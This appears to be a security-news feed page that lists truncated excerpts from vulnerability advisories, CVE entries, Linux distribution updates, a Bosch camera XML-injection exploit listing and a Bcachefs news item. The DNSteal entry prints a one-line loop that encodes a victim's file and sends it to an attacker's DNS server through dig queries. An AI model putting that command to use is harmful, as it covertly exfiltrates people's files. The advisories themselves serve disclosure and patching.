Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection

Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface Date: 01/09/2015 Exploit Author: neom22 Vendor Homepage: http://us.boschsecurity.com Data Sheet:...

Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection Vulnerability

Exploit for hardware platform in category web applications Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface Date: 01/09/2015 Exploit Author: neom22 Vendor Homepage: http://us.boschsecurity.com Data Sheet:...

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...

Amazon Linux: Security Advisory (ALAS-2013-171)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2015-3966

The IPsec SA establishment process on Innominate mGuard devices with firmware 8.x before 8.1.7 allows remote authenticated users to cause a denial of service VPN service restart by leveraging a peer relationship to send a crafted configuration with compression...

ownCloud: demo.owncloud.org: HTTP compression is enabled potentially leading to BREACH attack

@pareshparmar reported the BREACH vulnerability on demo.owncloud.org. ownCloud has meanwhile disabled compression on the system. It should be noted that starting with ownCloud 8.2 the CSRF token is randomized for each request. As per request by the reporter this issue has only been disclosed...

Meet Linux's New Fastest File-System – Bcachefs

First announced over five years ago, ex-Google engineer Kent Overstreet is pleasured in announcing the general availability of a new open-source file-system for Linux, called the Bcache File System or Bcachefs. Bcachefs is a Linux kernel block layer cache that aims at offering a speedier and more...

[SECURITY] Fedora 23 Update: libpgf-6.14.12-4.fc23

libPGF contains an implementation of the Progressive Graphics File PGF which is a new image file format, that is based on a discrete, fast wavelet transform with progressive coding features. PGF can be used for lossless and lossy compression...

[SECURITY] Fedora 21 Update: lighttpd-1.4.36-1.fc21

Secure, fast, compliant and very flexible web-server which has been optimiz ed for high-performance environments. It has a very low memory footprint compa red to other webservers and takes care of cpu-load. Its advanced feature-set FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many mo...

Moderate: Red Hat Security Advisory: sudo security, bug fix, and enhancement update

Updated sudo packages that fix one security issue, three bugs, and add one enhancement are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed...

[SECURITY] Fedora 21 Update: s3ql-2.13-1.fc21

S3QL is a file system that stores all its data online using storage services like Google Storage, Amazon S3 or OpenStack. S3QL effectively provides a ha rd disk of dynamic, infinite capacity that can be accessed from any computer with Internet access. S3QL is a standard conforming, full featured...

[SECURITY] Fedora 22 Update: s3ql-2.13-1.fc22

S3QL is a file system that stores all its data online using storage services like Google Storage, Amazon S3 or OpenStack. S3QL effectively provides a ha rd disk of dynamic, infinite capacity that can be accessed from any computer with Internet access. S3QL is a standard conforming, full featured...

CVE-2015-3677

The LZVN compression feature in AppleFSCompression in Apple OS X before 10.10.4 allows attackers to obtain sensitive memory-layout information for the kernel via a crafted app...

Design/Logic Flaw

The LZVN compression feature in AppleFSCompression in Apple OS X before 10.10.4 allows attackers to obtain sensitive memory-layout information for the kernel via a crafted app...

CVE-2015-3677

The LZVN compression feature in AppleFSCompression in Apple OS X before 10.10.4 allows attackers to obtain sensitive memory-layout information for the kernel via a crafted app...

CVE-2015-3677

CVE-2015-3677 affects Apple OS X prior to 10.10.4, specifically the LZVN compression feature in AppleFSCompression. The vulnerability allows a crafted app to disclose kernel memory layout, a memory-disclosure issue in LZVN processing. The underlying impact is partial leakage of kernel memory layo...

Apple MAC OS X LZVN Compression Memory Leak Vulnerability

Apple Mac OS X is a commercial operating system. A security vulnerability in Apple Mac OS X LZVN compression handling allows an attacker to run a malicious application to obtain memory layout information...

Apple OS X NTFS Compression Block Information Disclosure Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple OS X. User interaction is required to exploit this vulnerability in that the target must open a malicious file. The specific flaw exists within the handling of NTFS file systems. The issue li...

Medium: python27

Issue Overview: It was discovered that multiple Python standard library modules implementing network protocols such as httplib or smtplib failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of...

[SECURITY] Fedora 20 Update: ntfs-3g-2015.3.14-2.fc20

NTFS-3G is a stable, open source, GPL licensed, POSIX, read/write NTFS driver for Linux and many other operating systems. It provides safe handling of the Windows XP, Windows Server 2003, Windows 2000, Windows Vista, Windows Server 2008 and Windows 7 NTFS file systems. NTFS-3G can create, remove,...